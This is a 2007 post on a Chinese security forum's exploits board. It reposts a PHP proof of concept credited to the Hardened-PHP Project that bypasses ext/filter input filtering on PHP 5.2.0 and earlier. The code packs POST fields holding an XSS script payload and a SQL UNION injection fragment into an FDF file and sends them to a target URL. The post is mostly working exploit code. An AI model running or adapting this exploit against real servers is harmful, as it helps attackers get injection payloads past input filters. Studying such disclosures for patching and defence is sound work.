PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit

pub!1c

魔

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员

帖子: 3926
精华: 128
积分: 209876
阅读权限: 200
性别: 男
在线时间: 1114 小时
注册时间: 2007-10-23
最后登录: 2008-10-13

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2007-3-17 23:18 只看该作者

PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit

复制内容到剪贴板

代码:

<?php

 ////////////////////////////////////////////////////////////////////////

 // _ _        _           _    ___ _ _ ___ //

 // | || | __ _ _ _ __| | ___ _ _  ___ __| | ___ | _ \| || || _ \ //

 // | __ |/ _` || &#39;_|/ _` |/ -_)| &#39; \ / -_)/ _` ||___|| _/| __ || _/ //

 // |_||_|\__,_||_| \__,_|\___||_||_|\___|\__,_|   |_| |_||_||_|  //

 //                                  //

 //     Proof of concept code from the Hardened-PHP Project    //

 //          (C) Copyright 2007 Stefan Esser         //

 //                                  //

 ////////////////////////////////////////////////////////////////////////

 //      PHP ext/filtet FDF POST Filter Bybass Exploit      //

 ////////////////////////////////////////////////////////////////////////



 // This is meant as a protection against remote file inclusion.

 die("REMOVE THIS LINE");



 // _POST is the array that will be sent to the url in $url

 $_POST = array();

 $_POST[&#39;var1&#39;] = "<script>alert(/XSS/);</script>";

 $_POST[&#39;var2&#39;] = " &#39; UNION SELECT ";



 $url = "http://127.0.0.1/info.php"; 

 

 // You do not need to change anything below this

 

 $outfdf = fdf_create();

 foreach ($_POST as $key => $value) {

  fdf_set_value($outfdf, $key, $value, 0);

 }

 fdf_save($outfdf, "outtest.fdf");

 fdf_close($outfdf);

 

 $ret = file_get_contents("outtest.fdf");

 unlink("outtest.fdf");

 

 $params = array(&#39;http&#39; => array(

   &#39;method&#39; => &#39;POST&#39;,

   &#39;content&#39; => $ret,

   &#39;header&#39; => &#39;Content-Type: application/vnd.fdf&#39;

 ));

 

 $ctx = stream_context_create($params);

 $fp = @fopen($url, &#39;rb&#39;, false, $ctx);

 if (!$fp) {

  die("Cannot open $url");

 }

 $response = @stream_get_contents($fp); 



 echo $response;

 echo "\n";

?>

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit

PHP &lt;= 5.2.0 ext/filter FDF Post Filter Bypass Exploit

PHP &lt;= 5.2.0 ext/filter FDF Post Filter Bypass Exploit

代码:

PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit

PHP <= 5.2.0 ext/filter FDF Post Filter Bypass Exploit